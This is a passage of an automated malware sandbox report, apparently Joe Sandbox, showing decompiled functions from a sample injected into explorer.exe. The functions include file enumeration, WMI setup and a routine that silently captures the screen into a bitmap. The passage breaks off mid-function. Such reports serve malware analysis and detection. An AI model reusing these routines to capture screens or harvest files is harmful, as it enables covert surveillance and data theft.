                                                                                                            APIs
                                                                                                            • CreateFileW.KERNELBASE(00000000,40000000,00000000,00000000,00000001,00000080,00000000,00000000,00000000,00000000,032E96EF), ref: 032EB472
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: f640a390e329b48db94e42a5823df319e18973a746a95dd19a8675fa3299ed4a
                                                                                                            • Instruction ID: 964049bf4472a1d6d428367039e381ba5448be816d722a97e3c5e52924d9119b
                                                                                                            • Opcode Fuzzy Hash: f640a390e329b48db94e42a5823df319e18973a746a95dd19a8675fa3299ed4a
                                                                                                            • Instruction Fuzzy Hash: 0AE09AB33101197EE320AAA8ACC9F7B269CE7896F9F4546B4FA15C7280C6208C404370
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 032EC59C Relevance: 1.5, APIs: 1, Instructions: 25COMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 235 32ec59c-32ec5b3 237 32ec5d4-32ec5d6 235->237 238 32ec5b5-32ec5c3 235->238 240 32ec5c8-32ec5d2 FindCloseChangeNotification 238->240 241 32ec5c5-32ec5c7 238->241 240->237 241->240
                                                                                                            C-Code - Quality: 89%
                                                                                                            			E032EC59C(void* __ecx) {
				intOrPtr _t4;
				void* _t5;
				intOrPtr _t6;
				void* _t12;
				void* _t13;

				_t4 =  *0x32ff8e0; // 0x52ef6c8
				_t13 = 0;
				_t5 =  *((intOrPtr*)(_t4 + 0xc8))(2, 0, __ecx);
				_t12 = _t5;
				if(_t12 != 0) {
					_t6 =  *0x32ff8e0; // 0x52ef6c8
					_push(_t12);
					if( *((intOrPtr*)(_t6 + 0xcc))() != 0) {
						_t13 = 1;
					}
					FindCloseChangeNotification(_t12);
					return _t13;
				}
				return _t5;
			}








                                                                                                            0x032ec59c
                                                                                                            0x032ec5a4
                                                                                                            0x032ec5a9
                                                                                                            0x032ec5af
                                                                                                            0x032ec5b3
                                                                                                            0x032ec5b5
                                                                                                            0x032ec5ba
                                                                                                            0x032ec5c3
                                                                                                            0x032ec5c7
                                                                                                            0x032ec5c7
                                                                                                            0x032ec5cf
                                                                                                            0x00000000
                                                                                                            0x032ec5d2
                                                                                                            0x032ec5d6

                                                                                                            APIs
                                                                                                            • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000,032E4282,?,?,?,?,?,?,?,?,032E4367,00000000), ref: 032EC5CF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: ChangeCloseFindNotification
                                                                                                            • String ID:
                                                                                                            • API String ID: 2591292051-0
                                                                                                            • Opcode ID: 673597cea646bb877cd7c33495f02e24702ac7b7afa0f833d614f42cf3b197b3
                                                                                                            • Instruction ID: 5865f87ccde02e5a9ffee9807f47b0466c89233ca92e2d9ce059cbfb5500d90c
                                                                                                            • Opcode Fuzzy Hash: 673597cea646bb877cd7c33495f02e24702ac7b7afa0f833d614f42cf3b197b3
                                                                                                            • Instruction Fuzzy Hash: 3CE04F323111316FD360ABE9FC4DE777AA8EB85AA1B0A417CF909C7244DA20C802D7A0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 032EB49B Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 242 32eb49b-32eb4bb CreateFileW
                                                                                                            C-Code - Quality: 68%
                                                                                                            			E032EB49B(WCHAR* __ecx) {
				signed int _t5;

				_t5 = CreateFileW(__ecx, 0x80000000, 1, 0, 3, 0, 0);
				_t2 = _t5 + 1; // 0x1
				asm("sbb ecx, ecx");
				return _t5 &  ~_t2;
			}




                                                                                                            0x032eb4af
                                                                                                            0x032eb4b2
                                                                                                            0x032eb4b7
                                                                                                            0x032eb4bb

                                                                                                            APIs
                                                                                                            • CreateFileW.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000000,00000000,032EB583,00000000,00000400,00000000,00000000,?,032F0C39,00000000,00000000), ref: 032EB4AF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateFile
                                                                                                            • String ID:
                                                                                                            • API String ID: 823142352-0
                                                                                                            • Opcode ID: bbf102e23430bad08383145e37f97e533414f67d8fc10d938cc8259817be7060
                                                                                                            • Instruction ID: d391b862b8c025016014a1a28f003c01ae18d74d1db6cce9ca6d348bd24a7a1f
                                                                                                            • Opcode Fuzzy Hash: bbf102e23430bad08383145e37f97e533414f67d8fc10d938cc8259817be7060
                                                                                                            • Instruction Fuzzy Hash: 60D012B13601007EFB1C9A24DC5AF71339CD700701F15055C7A02D60E0D555D9148710
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 032E8D70 Relevance: 1.5, APIs: 1, Instructions: 8memoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 243 32e8d70-32e8d85 RtlAllocateHeap
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E032E8D70(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x32ff9c8, 8, _a4); // executed
				return _t2;
			}




                                                                                                            0x032e8d7e
                                                                                                            0x032e8d85

                                                                                                            APIs
                                                                                                            • RtlAllocateHeap.NTDLL(00000008,?,?,032E973A,00000100,?,032E65BF), ref: 032E8D7E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 1279760036-0
                                                                                                            • Opcode ID: 7ceb5f95fa3ef484f541bb06f460477a8ab1bb91271513b8e0cdb55d426c63e6
                                                                                                            • Instruction ID: 91b54f8e3f86b3e46937997f44b9542ebbf4b6ad0868c05ec2d2396ee552681d
                                                                                                            • Opcode Fuzzy Hash: 7ceb5f95fa3ef484f541bb06f460477a8ab1bb91271513b8e0cdb55d426c63e6
                                                                                                            • Instruction Fuzzy Hash: AFB09235080208FFCF012A81FD09A843F29EB44661F008021F60848064CB6364A09B94
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 032E8D5B Relevance: 1.5, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                            Download Yara Rule

                                                                                                            Control-flow Graph

                                                                                                            • Executed
                                                                                                            • Not Executed
                                                                                                            control_flow_graph 244 32e8d5b-32e8d6f HeapCreate
                                                                                                            C-Code - Quality: 100%
                                                                                                            			E032E8D5B() {
				void* _t1;

				_t1 = HeapCreate(0, 0x96000, 0); // executed
				 *0x32ff9c8 = _t1;
				return _t1;
			}




                                                                                                            0x032e8d64
                                                                                                            0x032e8d6a
                                                                                                            0x032e8d6f

                                                                                                            APIs
                                                                                                            • HeapCreate.KERNELBASE(00000000,00096000,00000000,032E65BA), ref: 032E8D64
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: CreateHeap
                                                                                                            • String ID:
                                                                                                            • API String ID: 10892065-0
                                                                                                            • Opcode ID: bc8581fff14f8a4d9690c522d2739f139a36e837172caa07d6eb06911a54295a
                                                                                                            • Instruction ID: 4c3e48ffa70a1165f4e73a1b3af950d0f215f3df1863224784cb70f40c2dcab6
                                                                                                            • Opcode Fuzzy Hash: bc8581fff14f8a4d9690c522d2739f139a36e837172caa07d6eb06911a54295a
                                                                                                            • Instruction Fuzzy Hash: E8B01270A81300FFDB502B207C4EB003520E340B12F208026F609982C8C7B010409518
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 032F0BA4 Relevance: 1.4, APIs: 1, Instructions: 115sleepCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 85%
                                                                                                            			E032F0BA4(void* __edx) {
				signed int _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				intOrPtr _t27;
				char _t28;
				intOrPtr _t30;
				void* _t32;
				void* _t37;
				char _t38;
				intOrPtr _t39;
				char _t42;
				intOrPtr _t51;
				intOrPtr* _t61;
				intOrPtr _t64;
				signed int _t71;
				void* _t75;
				void* _t78;
				void* _t79;

				_t27 =  *0x32ff8a4; // 0x52ef6b0
				_t28 = E032E8D70( *((intOrPtr*)(_t27 + 4))); // executed
				_v12 = _t28;
				if(_t28 != 0) {
					_t61 =  *0x32ff8a4; // 0x52ef6b0
					if( *((intOrPtr*)(_t61 + 4)) > 0x400) {
						E032E8E4D(_t28,  *_t61, 0x400);
						_v8 = _v8 & 0x00000000;
						_t37 = E032E109A(_t61, 0x46);
						_t64 =  *0x32ff8e4; // 0x3310000
						asm("sbb ecx, ecx");
						_t38 = E032E9F8F(( ~( *(_t64 + 0xa8)) & 0x00000034) + 0xaaa, ( ~( *(_t64 + 0xa8)) & 0x00000034) + 0xaaa);
						_push(0);
						_push(_t37);
						_v24 = _t38;
						_push(0x32fc9d8);
						_push(_t38);
						_t39 =  *0x32ff8e4; // 0x3310000
						_push(0x32fc9d8);
						_v20 = E032E9BF7(_t39 + 0x1020);
						_t42 = E032EB564(_t41,  &_v8); // executed
						_v16 = _t42;
						E032E8D41( &_v24);
						E032E8D41( &_v20);
						_t73 = _v16;
						_t79 = _t78 + 0x3c;
						_t71 = _v8;
						if(_v16 != 0 && _t71 > 0x400) {
							_t51 =  *0x32ff8a4; // 0x52ef6b0
							if(_t71 >=  *(_t51 + 4)) {
								_t71 =  *(_t51 + 4);
							}
							E032E8E4D(_v12 + 0x400, _t73 + 0x400, _t71 - 0x400);
							_t71 = _v8;
							_t79 = _t79 + 0xc;
						}
						E032E8D86( &_v16, _t71); // executed
						E032E8D86( &_v20, 0xfffffffe);
						_t28 = _v12;
						_t78 = _t79 + 0x10;
					}
					_t75 = 0;
					while(1) {
						_t30 =  *0x32ff8e4; // 0x3310000
						_t32 = E032EB604(_t30 + 0x228, _t28, 0x1000); // executed
						_t78 = _t78 + 0xc;
						if(_t32 >= 0) {
							break;
						}
						Sleep(1);
						_t75 = _t75 + 1;
						if(_t75 < 0x2710) {
							_t28 = _v12;
							continue;
						}
						break;
					}
					E032E8D86( &_v12, 0);
				}
				return 0;
			}























                                                                                                            0x032f0baa
                                                                                                            0x032f0bb2
                                                                                                            0x032f0bb7
                                                                                                            0x032f0bbd
                                                                                                            0x032f0bc3
                                                                                                            0x032f0bd3
                                                                                                            0x032f0bdd
                                                                                                            0x032f0be2
                                                                                                            0x032f0be8
                                                                                                            0x032f0bed
                                                                                                            0x032f0bfd
                                                                                                            0x032f0c09
                                                                                                            0x032f0c0e
                                                                                                            0x032f0c10
                                                                                                            0x032f0c16
                                                                                                            0x032f0c19
                                                                                                            0x032f0c1a
                                                                                                            0x032f0c1b
                                                                                                            0x032f0c20
                                                                                                            0x032f0c2f
                                                                                                            0x032f0c34
                                                                                                            0x032f0c39
                                                                                                            0x032f0c40
                                                                                                            0x032f0c49
                                                                                                            0x032f0c4e
                                                                                                            0x032f0c51
                                                                                                            0x032f0c54
                                                                                                            0x032f0c59
                                                                                                            0x032f0c5f
                                                                                                            0x032f0c67
                                                                                                            0x032f0c69
                                                                                                            0x032f0c69
                                                                                                            0x032f0c83
                                                                                                            0x032f0c88
                                                                                                            0x032f0c8b
                                                                                                            0x032f0c8b
                                                                                                            0x032f0c93
                                                                                                            0x032f0c9e
                                                                                                            0x032f0ca3
                                                                                                            0x032f0ca6
                                                                                                            0x032f0ca6
                                                                                                            0x032f0ca9
                                                                                                            0x032f0cab
                                                                                                            0x032f0cb1
                                                                                                            0x032f0cbc
                                                                                                            0x032f0cc1
                                                                                                            0x032f0cc6
                                                                                                            0x00000000
                                                                                                            0x00000000
                                                                                                            0x032f0ccf
                                                                                                            0x032f0cd5
                                                                                                            0x032f0cdc
                                                                                                            0x032f0cde
                                                                                                            0x00000000
                                                                                                            0x032f0cde
                                                                                                            0x00000000
                                                                                                            0x032f0cdc
                                                                                                            0x032f0ce9
                                                                                                            0x032f0cf1
                                                                                                            0x032f0cf5

                                                                                                            APIs
                                                                                                              • Part of subcall function 032E8D70: RtlAllocateHeap.NTDLL(00000008,?,?,032E973A,00000100,?,032E65BF), ref: 032E8D7E
                                                                                                            • Sleep.KERNELBASE(00000001,?,00000000,00000000,?,?,?,?,032F0AD2,?,?,?,032F0E97,00000000), ref: 032F0CCF
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: AllocateHeapSleep
                                                                                                            • String ID:
                                                                                                            • API String ID: 4201116106-0
                                                                                                            • Opcode ID: 6f3f9a3eeb9a63f0983eddab440f5fa64d14fa190beed03fa39bdcfe8ba74985
                                                                                                            • Instruction ID: 3a7793acf23837fef8c2891a6f7ba54aaa16e2f690a5a3a0ccdb2f9c0122cb57
                                                                                                            • Opcode Fuzzy Hash: 6f3f9a3eeb9a63f0983eddab440f5fa64d14fa190beed03fa39bdcfe8ba74985
                                                                                                            • Instruction Fuzzy Hash: 91419676A10205BFDB04EBE4DD8AFAEB3BCEF04314F584179E605EB281D675A9808754
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Non-executed Functions

                                                                                                            Function 032E5CC4 Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 223windowCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 98%
                                                                                                            			E032E5CC4(int* __ecx) {
				signed int _v8;
				char _v12;
				int _v16;
				struct HWND__* _v20;
				struct HWND__* _v24;
				struct HDC__* _v28;
				void* _v32;
				int* _v36;
				void* _v40;
				void* _v44;
				void* _v48;
				void* _v52;
				void* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				short _v82;
				short _v84;
				signed int _v88;
				signed int _v92;
				struct tagBITMAPINFO _v96;
				intOrPtr _v102;
				int _v110;
				char _v112;
				void* _v116;
				void* _v120;
				void* _v124;
				void* _v132;
				void* _v136;
				void* _v140;
				int _v156;
				signed int _v160;
				void _v164;
				int _t82;
				void* _t84;
				signed int _t92;
				void* _t99;
				char _t103;
				intOrPtr _t113;
				int* _t114;
				struct HDC__* _t120;
				signed int _t124;
				short _t137;
				struct HDC__* _t141;
				void* _t144;
				void* _t148;

				_v36 = __ecx;
				_v24 = 0;
				_t120 = 0;
				_v12 = 0;
				_t144 = 0;
				_v20 = 0;
				_t141 = GetDC(0);
				_v28 = _t141;
				if(_t141 != 0) {
					_t120 = CreateCompatibleDC(_t141);
					if(_t120 != 0) {
						_v8 = GetDeviceCaps(_t141, 8);
						_t82 = GetDeviceCaps(_t141, 0xa);
						_v16 = _t82;
						_t144 = CreateCompatibleBitmap(_t141, _v8, _t82);
						if(_t144 != 0) {
							_t84 = SelectObject(_t120, _t144);
							_v32 = _t84;
							if(_t84 != 0) {
								_t144 = SelectObject(_t120, _v32);
								if(_t144 != 0) {
									GetObjectW(_t144, 0x18,  &_v164);
									_t92 = _v160;
									_t124 = _v156;
									_v92 = _t92;
									_v84 = 1;
									_t137 = 0x20;
									_v82 = _t137;
									_v96.bmiHeader = 0x28;
									_v80 = 0;
									_v76 = 0;
									_v72 = 0;
									_v68 = 0;
									_v64 = 0;
									_v60 = 0;
									asm("cdq");
									_v88 = _t124;
									_v8 = ((_t92 << 5) + 0x1f >> 5) * _t124 << 2;
									_t99 = E032E8D70(((_t92 << 5) + 0x1f >> 5) * _t124 << 2);
									_v20 = _t99;
									if(_t99 != 0) {
										GetDIBits(_t120, _t144, 0, _v156, _t99,  &_v96, 0);
										_v16 = _v8 + 0x36;
										_t103 = E032E8D70(_v8 + 0x36);
										_v12 = _t103;
										if(_t103 != 0) {
											_v110 = _v16;
											_v112 = 0x4d42;
											_v102 = 0x36;
											E032E8E4D(_t103,  &_v112, 0xe);
											E032E8E4D(_v12 + 0xe,  &_v96, 0x28);
											E032E8E4D(_v12 + 0x36, _v20, _v8);
											_t148 = _t148 + 0x24;
											_v8 = _v8 & 0x00000000;
											_t113 = E032EFC7B(_v12, _v16,  &_v8);
											_v24 = _t113;
											if(_t113 != 0) {
												_t114 = _v36;
												if(_t114 != 0) {
													 *_t114 = _v8;
												}
											}
										}
									}
								}
							}
						}
					}
				}
				E032E8D86( &_v20, 0);
				E032E8D86( &_v12, 0);
				if(_t120 != 0) {
					DeleteDC(_t120);
				}
				if(_t141 != 0) {
					DeleteDC(_t141);
				}
				if(_t144 != 0) {
					DeleteObject(_t144);
				}
				return _v24;
			}




















































                                                                                                            0x032e5cd0
                                                                                                            0x032e5cd6
                                                                                                            0x032e5cd9
                                                                                                            0x032e5cdb
                                                                                                            0x032e5cde
                                                                                                            0x032e5ce0
                                                                                                            0x032e5ce9
                                                                                                            0x032e5ceb
                                                                                                            0x032e5cf0
                                                                                                            0x032e5cfd
                                                                                                            0x032e5d01
                                                                                                            0x032e5d15
                                                                                                            0x032e5d18
                                                                                                            0x032e5d1e
                                                                                                            0x032e5d28
                                                                                                            0x032e5d2c
                                                                                                            0x032e5d34
                                                                                                            0x032e5d3a
                                                                                                            0x032e5d3f
                                                                                                            0x032e5dd5
                                                                                                            0x032e5dd9
                                                                                                            0x032e5de9
                                                                                                            0x032e5def
                                                                                                            0x032e5df7
                                                                                                            0x032e5dfe
                                                                                                            0x032e5e01
                                                                                                            0x032e5e0a
                                                                                                            0x032e5e0b
                                                                                                            0x032e5e14
                                                                                                            0x032e5e1b
                                                                                                            0x032e5e1e
                                                                                                            0x032e5e21
                                                                                                            0x032e5e24
                                                                                                            0x032e5e27
                                                                                                            0x032e5e2a
                                                                                                            0x032e5e2d
                                                                                                            0x032e5e31
                                                                                                            0x032e5e40
                                                                                                            0x032e5e43
                                                                                                            0x032e5e48
                                                                                                            0x032e5e4e
                                                                                                            0x032e5e65
                                                                                                            0x032e5e72
                                                                                                            0x032e5e75
                                                                                                            0x032e5e7a
                                                                                                            0x032e5e80
                                                                                                            0x032e5e85
                                                                                                            0x032e5e8d
                                                                                                            0x032e5e98
                                                                                                            0x032e5e9f
                                                                                                            0x032e5eb4
                                                                                                            0x032e5ec9
                                                                                                            0x032e5ed7
                                                                                                            0x032e5eda
                                                                                                            0x032e5edf
                                                                                                            0x032e5ee4
                                                                                                            0x032e5eea
                                                                                                            0x032e5eec
                                                                                                            0x032e5ef1
                                                                                                            0x032e5ef6
                                                                                                            0x032e5ef6
                                                                                                            0x032e5ef1
                                                                                                            0x032e5eea
                                                                                                            0x032e5e80
                                                                                                            0x032e5e4e
                                                                                                            0x032e5dd9
                                                                                                            0x032e5d3f
                                                                                                            0x032e5d2c
                                                                                                            0x032e5d01
                                                                                                            0x032e5efe
                                                                                                            0x032e5f09
                                                                                                            0x032e5f13
                                                                                                            0x032e5f16
                                                                                                            0x032e5f16
                                                                                                            0x032e5f1e
                                                                                                            0x032e5f21
                                                                                                            0x032e5f21
                                                                                                            0x032e5f29
                                                                                                            0x032e5f2c
                                                                                                            0x032e5f2c
                                                                                                            0x032e5f39

                                                                                                            APIs
                                                                                                            • GetDC.USER32(00000000), ref: 032E5CE3
                                                                                                            • CreateCompatibleDC.GDI32(00000000), ref: 032E5CF7
                                                                                                            • GetDeviceCaps.GDI32(00000000,00000008), ref: 032E5D10
                                                                                                            • GetDeviceCaps.GDI32(00000000,0000000A), ref: 032E5D18
                                                                                                            • CreateCompatibleBitmap.GDI32(00000000,?,00000000), ref: 032E5D22
                                                                                                            • SelectObject.GDI32(00000000,00000000), ref: 032E5D34
                                                                                                            • BitBlt.GDI32(00000000,00000000,00000000,?,?,00000000,00000000,00000000,00CC0020), ref: 032E5D58
                                                                                                            • GetCursorInfo.USER32(?), ref: 032E5D69
                                                                                                            • CopyIcon.USER32 ref: 032E5D7E
                                                                                                            • GetIconInfo.USER32(00000000,?), ref: 032E5D8C
                                                                                                            • GetObjectW.GDI32(?,00000018,?), ref: 032E5DAA
                                                                                                            • DrawIconEx.USER32 ref: 032E5DC2
                                                                                                            • SelectObject.GDI32(00000000,?), ref: 032E5DCF
                                                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 032E5DE9
                                                                                                            • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000028,00000000), ref: 032E5E65
                                                                                                            • DeleteDC.GDI32(00000000), ref: 032E5F16
                                                                                                            • DeleteDC.GDI32(00000000), ref: 032E5F21
                                                                                                            • DeleteObject.GDI32(00000000), ref: 032E5F2C
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Object$DeleteIcon$CapsCompatibleCreateDeviceInfoSelect$BitmapBitsCopyCursorDraw
                                                                                                            • String ID: ($6
                                                                                                            • API String ID: 192358524-4149066357
                                                                                                            • Opcode ID: b71cfc2de499fa481c6dcd2a88a67a40cf8a4880bac0520acceefe7ab628898b
                                                                                                            • Instruction ID: 94bb3d208aa9f562210cca721232a19215d4c505307601c713f20f01a73baa61
                                                                                                            • Opcode Fuzzy Hash: b71cfc2de499fa481c6dcd2a88a67a40cf8a4880bac0520acceefe7ab628898b
                                                                                                            • Instruction Fuzzy Hash: 79812A72D10219AFDB20DFA5DC49BAEBBB8EF49710F548069E504F7250DB709A85CFA0
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 032EE503 Relevance: 7.6, APIs: 5, Instructions: 87commemoryCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 30%
                                                                                                            			E032EE503(void* __ecx) {
				char _v8;
				void* _v12;
				char* _t15;
				intOrPtr* _t16;
				void* _t21;
				intOrPtr* _t23;
				intOrPtr* _t24;
				intOrPtr* _t25;
				void* _t30;
				void* _t33;

				_v12 = 0;
				_v8 = 0;
				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
				_t15 =  &_v12;
				__imp__CoCreateInstance(0x32fc8a0, 0, 1, 0x32fc8b0, _t15);
				if(_t15 < 0) {
					L5:
					_t23 = _v8;
					if(_t23 != 0) {
						 *((intOrPtr*)( *_t23 + 8))(_t23);
					}
					_t24 = _v12;
					if(_t24 != 0) {
						 *((intOrPtr*)( *_t24 + 8))(_t24);
					}
					_t16 = 0;
				} else {
					__imp__#2(__ecx);
					_t25 = _v12;
					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
					if(_t21 < 0) {
						goto L5;
					} else {
						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
						if(_t21 < 0) {
							goto L5;
						} else {
							_t16 = E032E8D70(8);
							if(_t16 == 0) {
								goto L5;
							} else {
								 *((intOrPtr*)(_t16 + 4)) = _v12;
								 *_t16 = _v8;
							}
						}
					}
				}
				return _t16;
			}













                                                                                                            0x032ee510
                                                                                                            0x032ee513
                                                                                                            0x032ee516
                                                                                                            0x032ee527
                                                                                                            0x032ee52d
                                                                                                            0x032ee53e
                                                                                                            0x032ee546
                                                                                                            0x032ee597
                                                                                                            0x032ee597
                                                                                                            0x032ee59c
                                                                                                            0x032ee5a1
                                                                                                            0x032ee5a1
                                                                                                            0x032ee5a4
                                                                                                            0x032ee5a9
                                                                                                            0x032ee5ae
                                                                                                            0x032ee5ae
                                                                                                            0x032ee5b1
                                                                                                            0x032ee548
                                                                                                            0x032ee549
                                                                                                            0x032ee54f
                                                                                                            0x032ee560
                                                                                                            0x032ee565
                                                                                                            0x00000000
                                                                                                            0x032ee567
                                                                                                            0x032ee574
                                                                                                            0x032ee57c
                                                                                                            0x00000000
                                                                                                            0x032ee57e
                                                                                                            0x032ee580
                                                                                                            0x032ee588
                                                                                                            0x00000000
                                                                                                            0x032ee58a
                                                                                                            0x032ee58d
                                                                                                            0x032ee593
                                                                                                            0x032ee593
                                                                                                            0x032ee588
                                                                                                            0x032ee57c
                                                                                                            0x032ee565
                                                                                                            0x032ee5b6

                                                                                                            APIs
                                                                                                            • CoInitializeEx.OLE32(00000000,00000000,00000000,00000000,00000000,00000000,?,032EE834,0000054E,00000000,00000000,00000005), ref: 032EE516
                                                                                                            • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,032EE834,0000054E,00000000,00000000,00000005), ref: 032EE527
                                                                                                            • CoCreateInstance.OLE32(032FC8A0,00000000,00000001,032FC8B0,00000000,?,032EE834,0000054E,00000000,00000000,00000005), ref: 032EE53E
                                                                                                            • SysAllocString.OLEAUT32(00000000), ref: 032EE549
                                                                                                            • CoSetProxyBlanket.OLE32(00000005,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,032EE834,0000054E,00000000,00000000,00000005), ref: 032EE574
                                                                                                              • Part of subcall function 032E8D70: RtlAllocateHeap.NTDLL(00000008,?,?,032E973A,00000100,?,032E65BF), ref: 032E8D7E
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 0000001D.00000002.721903989.00000000032E0000.00000040.80000000.00040000.00000000.sdmp, Offset: 032E0000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_29_2_32e0000_explorer.jbxd
                                                                                                            Yara matches
                                                                                                            Similarity
                                                                                                            • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
                                                                                                            • String ID:
                                                                                                            • API String ID: 1610782348-0
                                                                                                            • Opcode ID: 22c5262464d34f14ca18390457dd37243c4886914d7b222049f619a0750c4aad
                                                                                                            • Instruction ID: 12f322411fa4a624a98f79da8765b7ac83b6fce5a7becc5820bb083cab735d8b
                                                                                                            • Opcode Fuzzy Hash: 22c5262464d34f14ca18390457dd37243c4886914d7b222049f619a0750c4aad
                                                                                                            • Instruction Fuzzy Hash: FF213770610245BFEB249B62DC5DEAFBF7CEFC6F10F01406DB515A6290D6B19A80CA30
                                                                                                            Uniqueness

                                                                                                            Uniqueness Score: -1.00%

                                                                                                            Function 032EC134 Relevance: 3.1, APIs: 2, Instructions: 105fileCOMMON
                                                                                                            Download Yara Rule
                                                                                                            C-Code - Quality: 78%
                                                                                                            			E032EC134(void* __ecx, void* __fp0, intOrPtr _a16) {
				char _v12;
				WCHAR* _v16;
				struct _WIN32_FIND_DATAW _v608;
				WCHAR* _t24;
				intOrPtr _t31;
				intOrPtr _t41;
				void* _t45;
				intOrPtr _t46;
				void* _t48;
				intOrPtr _t54;
				void* _t59;
				char _t60;
				void* _t61;
				void* _t62;
				void* _t63;
				void* _t75;

				_t75 = __fp0;
				_push(0);
				_t48 = __ecx;
				_push(L"\\*");
				_t24 = E032E9BF7(__ecx);
				_t63 = _t62 + 0xc;
				_v16 = _t24;
				if(_t24 == 0) {
					return _t24;
				}
				_t59 = FindFirstFileW(_t24,  &_v608);
				if(_t59 == 0xffffffff) {
					L14:
					return E032E8D86( &_v16, 0xfffffffe);
				} else {
					goto L2;
				}
				do {
					L2:
					if(E032EC10C( &(_v608.cFileName)) != 0) {
						goto L12;
					}
					if((_v608.dwFileAttributes & 0x00000010) != 0) {
						L10:
						_push(0);
						_push( &(_v608.cFileName));
						_push(0x32fc9d8);
						_t60 = E032E9BF7(_t48);
						_t63 = _t63 + 0x10;
						_v12 = _t60;
						if(_t60 != 0) {
							_t54 =  *0x32ff8e0; // 0x52ef6c8
							 *((intOrPtr*)(_t54 + 0xc0))(1);
							_push(1);
							_push(1);
							_push(0);
							E032EC134(_t60, _t75, 1, 5, E032F0197, _a16);
							_t63 = _t63 + 0x1c;
